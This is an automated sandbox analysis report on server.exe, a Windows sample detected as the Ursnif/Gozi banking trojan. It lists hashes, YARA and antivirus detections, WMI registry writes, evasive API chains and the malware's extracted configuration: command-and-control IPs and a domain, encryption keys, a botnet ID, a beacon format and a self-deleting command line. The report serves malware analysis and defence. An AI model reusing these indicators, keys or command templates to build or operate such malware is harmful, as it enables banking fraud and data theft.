
Windows Analysis Report
server.exe

Overview

General Information

Sample Name: server.exe
Analysis ID: 830549
MD5: 2ca14653601a8e9adb830e183c5874d7
SHA1: 0e75f94eb23c8aac9b3301951d2df8639304a165
SHA256: a9934cc506821e82237fdaf471f845e1e027b37841d635f971b8df6853e9d7f9
Tags: agenziaentrate, exe, gozi, isfb, mef, mise, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • server.exe (PID: 6052 cmdline: C:\Users\user\Desktop\server.exe MD5: 2CA14653601A8E9ADB830E183C5874D7)
  • cleanup
Name: Gozi, Ursnif
Description:
  • Timeline: 2000 Ursnif aka Snifula; 2006 Gozi v1.0, Gozi CRM, CRM, Papras; 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia (*) -> 2010 Gozi Prinimalka -> Vawtrak/Neverquest
  • In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.
  • In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
Yara matches (Source | Rule | Description | Author | Strings)

  • Source: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Smokeloader_3687686f | Description: unknown | Author: unknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
  • Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security
  • Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_fd494041 | Description: unknown | Author: unknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
  • Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_261f5ac5 | Description: unknown | Author: unknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
  • Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security
      No Sigma rule has matched
      No Snort rule has matched


      AV Detection

      Source: server.exe | ReversingLabs: Detection: 35%
      Source: server.exe | Virustotal: Detection: 42%
      Source: server.exe | Joe Sandbox ML: detected
      Source: 0.2.server.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02221508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_02221508

      Compliance

      Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: server.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: unknown | DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: server.exe, 00000000.00000002.517572455.0000000000768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checklist.skype.com/
      Source: server.exe, 00000000.00000002.517572455.0000000000773000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checklist.skype.com/drew/8GsEYWG5R7vgd6ovGci/nrUBbPIi4nn3B9s17IICy8/dABAhwF5Li84O/L9tQ_2Fw/
      Source: server.exe, 00000000.00000002.517572455.0000000000768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checklist.skype.com/drew/8GsEYWG5R7vgd6ovGci/nrUBbPIi4nn3B9s17IICy8/dABAhwF5Li84O/L9tQ_2Fw/xJ
      Source: unknown | DNS traffic detected: queries for: checklist.skype.com

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      Source: Yara match | File source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR
      Source: server.exe, 00000000.00000002.517494434.000000000070A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud

      Source: Yara match | File source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02221508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_02221508

      System Summary

      Source: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: server.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_022216DF 0_2_022216DF
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0222832C 0_2_0222832C
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02221D8A 0_2_02221D8A
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0222421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_0222421F
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_02228551 NtQueryVirtualMemory,0_2_02228551
      Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00501C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_00501C58
      Source: server.exe | ReversingLabs: Detection: 35%
      Source: server.exe | Virustotal: Detection: 42%
      Source: server.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
